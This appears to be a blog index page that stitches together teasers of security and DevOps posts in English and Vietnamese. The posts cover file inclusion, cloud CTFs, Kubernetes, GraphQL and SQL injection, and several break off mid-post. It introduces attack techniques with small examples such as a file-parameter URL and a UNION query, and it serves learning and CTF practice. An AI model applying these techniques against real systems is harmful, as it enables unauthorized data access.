What is File inclusion? In some scenarios, web applications are written to request access to files on a given system, including images, static text, and so on via parameters. Parameters are query parameter strings attached to the URL that could be used to retrieve data or perform actions based on user input. The following graph explains and breaking down the essential parts of the URL. For example, parameters are used with Google searching, where GET requests pass user input into the search engine. https://www.google.com/search?q=TryHackMe With FI, Let's discuss a scenario where a user requests to access files from a webserver. First, the user sends an HTTP request to the webserver that includes a file to display. For example, if a user wants to access and display their CV within the web application, the request may look as follows, http://webapp.thm/get.php?file=userCV.pdf, where the file is the parameter and the userCV.pdf, is the required file to access. Why do File inclusion vulnerabilities happen? File inclusion vulnerabilities are commonly found and exploited in various programming languages for web applications, such as PHP that are poorly written and implemented. The main issue of these vulnerabilities is the input validation, in which the user inputs are not sanitized or validated, and the user controls them. When the input is not validated, the user can pass any input to the function, causing the vulnerability.

Tiếng việt Bảo mật ứng dụng trong quá trình lập trình phần mềm Đây là công đoạn yêu cầu nhiều tài nguyên và cách tiếp cận khác nhau để khai thác trong suốt quá trình phát triển của sản phẩm phần mềm (SDLC) Hình ảnh của Topdev Dựa vào hình ảnh ta thấy có 3 trình vận hành của một sản phẩm tượng ứng với nó là sản phẩm kiểm thử đi kèmSAST (Kiểm thử phần mềm tĩnh): Dùng trong các dự án kiểm thử Whitebox. Không cần biên dịch nên có thể là thành phần đầu tiên được triển khai. Ex: Sonarqube DAST (Kiểm thử phần mềm động): Dùng trong các dự án kiểm thử Blackbox. Chạy rồi mới kiểm thử như là check request, các lỗi phân tích cấu hình máy chủ, .... Ex: ZAP IAST (Kiểm thử phần mềm dạng tích hợp): Dùng trong các dự án graybox (Whitebox+blackbox). Cấu hình trong môi trường chạy thử nghiệm. Ex: Constrast Security RASP (Nôm na khá giống IDS và IPS). Dùng để có thể cấu hình trên máy chủ và bảo vệ nó theo thời gian thực. Ex Sqreen, Mod-security(Nginx)

image Monitoring and Observability for System [!Note] For purpose monitoring and observability the Kubernetes Cluster, nowaday you have many options to handle these configuration, such as Grafana Prometheus Loki Tempo

image Yo, Hello Hello @everyone. It's been a good week to bring back Hackwekend. Continuously, today we will learn and solve challenge CTF of Wiz.io about Cloud Security, Target today is IAM. Let digest bruh :smiling_face_with_smiling_eyes_and_hand_covering_mouth: image Challenge Link: BigIAMChallenge Challenge 1: Buckets of Fun Description: We all know that public buckets are risky. But can you find the flag?

Hi @all, that been a week and as usual, hackwekend session will be back with new topic, today we continuously learn about Cloud Security but more about Red team which can bring to you very cool technical hosted by Wiz.io. Let's digest :thumbsup: image Link to challenge: https://k8slanparty.com/ Challenge 1: Recon - DNSing with the stars Description You have shell access to compromised a Kubernetes pod at the bottom of this page, and your next objective is to compromise other internal services further.

Hi there @everyone, continue of my mood for writing blog, i will release something to help you define the alert on grafana just use by terraform and managing them :smile:. So go to find how to do that What you looking for Tools only for used to observation and monitoring like a visualizer. Just work with if exist datasource provider (E.x: Prometheus and metrics exporter) It contains multiple dashboard through WebUI for purpose monitoring For quickly to action with grafana, you need to consider with alert because it can annouce you on real time. Perfect :small_airplane: it have on Grafana Behind the scene of alert

Resource: QR Codes Exploitation: How to Mitigate the Risk? Create Malicious QR Codes to Hack Phones & Other Scanners Think before you scan: How fraudsters can exploit QR codes to steal money Qrljacking So what kind of technology become grow up in COVID19 pandemic and became popular method used to on during terrible time is QRCode :thinking_face: So i have couple question about QRcode like:

Hello BTB again. On this session, i will refer to anything i know about k8s during intership. I will cost you time but i think it will not completely and have error but i will do with best possibility.Let implement --> :small_airplane: && :balloon: Overview This session have whole a bunch of thing to talk. Let go with: Networking: This part is talk how to we point the the public IP for pods inside cluster How to setup the thing to do the above job

Description: Damning internal communications within Maple Bacon have been leaked, revealing a plot to steal the flags of other teams at the upcoming International Flag Admirers' Conference. You've gotten a hold of the leaked files. Find information that could help uncover the identity of the whistleblower. Attaching: Access link to get image Searching the internal image First, we look the black out cover the letter, so i think it may be or should be the hidden target we want to exploit so i try anything method to erase it but i don't having anything on that Second, i think about if i do change the color, what happen ? so any tools we can use like Stegsolve, photoshop or just the internet tool like aperisolve, all of them will make u change the color parameter of image and yeah let how to find anything else. Third, i don't know what the description mean but on the time to solve this chall i don't think about anything else about cipher or what technical, but i wrong, cipher is the factor to solve this chall. So Uncover huh ? may be it just the trap LOL :smiley:. --> So that all things i want to tell you about the image, i not sure there is anything else we can exploit, so just letmeknow :innocent:

Tiếng việt Giới thiệu và trình bày phương thức Bài toán đặt ra: Tìm hiểu AWS Cloud, xây dựng chương trình phân tích và giám sát các điểm yếu bảo mật từ bên ngoài.Tìm hiểu về hệ điều hành Linux: Chọn môi trường Linux là ubuntu làm môi trường VPS để host website Tìm hiều về môi trường AWS ==> Nhóm đã thực hiện xây dựng một website cụ thể là Juice-Shop OWASP TOP 10, một web site lớn để học tập về pentest Với VPC: sử dụng VPC và network mặc định của hệ thống AWS đã cấp Các rule và cổng được mở cho hệ thống được bao gồm trong security group và routing table với việc mở all-range 0.0.0.0/0 cho tất cả các lưu lượng truy cập từ bên ngoài vào hệ thống thông qua cổng 80 và config các ip cụ thể để truy cập SSH qua port 22 từ bên ngoài vào trong Chưa áp dụng loadblancer: Vì hosting chỉ thực hiện trên 1 EC2 nên chưa nhất thiết phải áp dụng loadblancer. Thực hiện build dự án bằng Docker ==> Container đã tồn tài sẵn vể juice-shop và opensource để thực hiện triển khai hệ thống cho sẵn. Link Docker-Image Về việc tìm hiểu Discord và telegram: Đây là 2 nền tảng rất phổ biến - Ở đây nhóm dự định xây dựng một bot để xử lí nhận thông báo hoặc tấn công dò lỗ hổng thông qua một API server được xây dựng - Sẽ được trình bày kĩ ở phía dưới

Definition: The Open Web Application Security Project (OWASP) is a nonprofit foundation dedicated to improving software security. It operates under an “open community” model, which means that anyone can participate in and contribute to OWASP-related online chats, projects, and more. For everything from online tools and videos to forums and events, the OWASP ensures that its offerings remain free and easily accessible through its website. The OWASP Top 10 provides rankings of—and remediation guidance for—the top 10 most critical web application security risks. Risks are ranked according to the frequency of discovered security defects, the severity of the uncovered vulnerabilities, and the magnitude of their potential impacts. The purpose of the report is to offer developers and web application security professionals insight into the most prevalent security risks so that they may fold the report’s findings and recommendations into their own security practices, thereby minimizing the presence of known risks in their applications. Base on tryhackme we consider in list 10 dropdown below: Injection

This is first blog which i wrote with sharing another topic out of Security. And it is the most of part i like i bring more new technology for my room. So in this session, i will talk about adventure to building NAS. Hope u can setup it for your own and have good time to learning new somestuff on network :coffee: So this so refference for my topic: https://www.youtube.com/watch?v=gyMpI8csWis&t=968s&ab_channel=NetworkChuck https://www.raspberrypi.com/tutorials/nas-box-raspberry-pi-tutorial/ What is NAS? Network-attached storage (NAS) allows you to save files from your computer and mobile devices to external hard drives via your home or office wireless network. Using Raspberry Pi, you can connect your existing storage devices — such as external portable hard drives and USB flash drives — to create secure backups of all your important files, accessible from anywhere in the world. Have some different on architecture SAN and NAS. So visualization to distinguishing btw

On the mood for sharing, This is second blog i am sharing for today, come and read about Setup MySQL with Wordpress in k8s: Easy migrate or not !!. So if you want to know about how to setup the Linux and Window VM for Azure-Pipeline, Go check it out downbelow What things are you looking for ? Azure Pipelines is one most of things Azure, I confess that pretty supercool than other thing alternative like Gitlab CI/CD, Github Action Why it good ? Template by what you want is why i like its, sofar it will help you optimize the time for customize new pipeline script but not make effect for another. But for doing this things and more secure, more time, more customize, Azure users will prefer how to use selfhost instead of vm provided by azure for purpose running the pipeline CI/CD on this Agents. The scenerio for setup the agent and more things about it VM is Linux or Windows can be have access by azure pipeline via token, It will contains the environment for doing with Azure Resource like create VM, interaction with K8s - Cluster so you need about role for it or Azure AD for creating Application Role for access anything via that IAM.

Azure Setup MySQL-Flexible Server 1. Configure slow querry logs Enable some require in Severparameter   --> Config it stay here Server parameters   2. Setup dianostics Have a note

Hi @all, welcome to my blog and today will talk about topic Cloud and specify about Cloud Security. With grow up and multi scale, Cloud or Cloud Computing is becoming the first options which refer for operating your system, orchestration system or security your infrastructure, that huge question about all. So via whistle by some contest of cloud security, i will refference platform which new release in month ago about aws and cloud security k8s via CTF Platform. It called EKS Cluster Games Link for participant: https://eksclustergames.com/ image "Give a huge thanks for Wiz Team who are making a great challenge for community, bring more experience for us." Some prequirement It is the game will play with terminal so you need to understand and similar with that one because you will typing not click :sob:

Hi, Welcome back with my Hackwekend series, I am so glad and graceful if you have reach here. Go luck and hope you finding the things you want The information of defination and exploit things is base on PortSwigger GraphQL, if you want to explore GraphQL, GraphQL API Security, Go and check that. In my blog, i just do brief with combine some information you need to understand for helping you work with GraphQL and exploit it. GraphQL - Find the way to rapidly go to the goal 1. Defination about GraphQL and why is this technologies released ? GraphQL is an API query language that is designed to facilitate efficient communication between clients and servers. It enables the user to specify exactly what data they want in the response, helping to avoid the large response objects and multiple calls that can sometimes be seen with REST APIs. image @XeusNguyen :thinking_face: "With GraphQL, it is releasing like alternative technology for RESTAPI, but it can't change the REST. GraphQL will help you optimize the query, get specify data base on your mind but i think it just like that, with some specify case you will need REST instead of Graph and reverse. The balancing of between of them is help you have multiple choice for optional when choose the right technologies"

Tiếng việt (TL;DR) Xin gửi lời cảm ơn đến anh: Louis Cremen-@proxyblue để có được thông tin thành một bài viết như vậy Tổng quan về an toàn thông tin, cấu trúc của một đội ngũ security và văn hóa DevSecOps trong doanh nghiệp An toàn thông tin là gì ? An toàn thông tin là hành động ngăn cản, phòng ngừa sự sử dụng, truy cập, tiết lộ, chia sẻ, phát tán, ghi lại hoặc phá hủy thông tin chưa có sự cho phép. Ngày nay vấn đề an toàn thông tin được xem là một trong những quan tâm hàng đầu của xã hội, có ảnh hưởng rất nhiều đến hầu hết các ngành khoa học tự nhiên, kỹ thuật, khoa học xã hội và kinh tế. An toàn thông tin ngày càng trở nên quan trọng, việc đảm bảo dữ liệu hay bảo vệ được bản thân trên không gian mạng này càng trở nên thiết yếu hơn bao giờ hết Chúng ta nên tự bảo vệ mình, nếu không muốn một ngày hình ảnh ta nó ở đâu đó trên mạng mà mình không biết --> Very terrify accident :scream:

HELLO, LONG TIME NO SEE I JUST BRING BACK AFTER THE BREAK STRUGGLE ISSUE ON IMPLEMENTATION AND PROVISIONING AND ALSO I JUST FINISHING THE FLAT OF CAPSTONE PROJECT FOR SCALING PROJECT. SO I JUST WRITE A BLOG FOR GIVE EXPERIENCE, TAKE A BREAK AFTER ISSUE I MET ON ALONG LAST WEEK. TERRIBLE AND STRESSFUL So i just want a talk it hard or not maybe base on your mindset. LOL and look below for meet some mistake when i met on provision progress :smiley:. Stay avoid it and don't make struggle mistake like me :face_with_finger_covering_closed_lips: The mindset on project: Migrate the on-prem wordpress to k8s wordpress, this is not to hard but also it will make you have some confuse and not understand when setup the another tools in K8s With wordpress, it always have legacy db - MySQL intergration with itself. So not only wordpress, we need to move mysql and datainside go to the k8s. Step by step of progress when migrate and why i have struggle with that. Setup the wordpress and mysql with k8s.

What is blind SQL injection? Blind SQL injection arises when an application is vulnerable to SQL injection, but its HTTP responses do not contain the results of the relevant SQL query or the details of any database errors. With blind SQL injection vulnerabilities, many techniques such as UNION attacks, are not effective because they rely on being able to see the results of the injected query within the application's responses. It is still possible to exploit blind SQL injection to access unauthorized data, but different techniques must be used. Exploiting blind SQL injection by triggering conditional responses Consider an application that uses tracking cookies to gather analytics about usage. Requests to the application include a cookie header like this: Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4

Union Querry Lab SQL injection UNION attacks When an application is vulnerable to SQL injection and the results of the query are returned within the application's responses, the UNION keyword can be used to retrieve data from other tables within the database. This results in an SQL injection UNION attack. The UNION keyword lets you execute one or more additional SELECT queries and append the results to the original query. For example: SELECT a, b FROM table1 UNION SELECT c, d FROM table2 This SQL query will return a single result set with two columns, containing values from columns a and b in table1 and columns c and d in table2.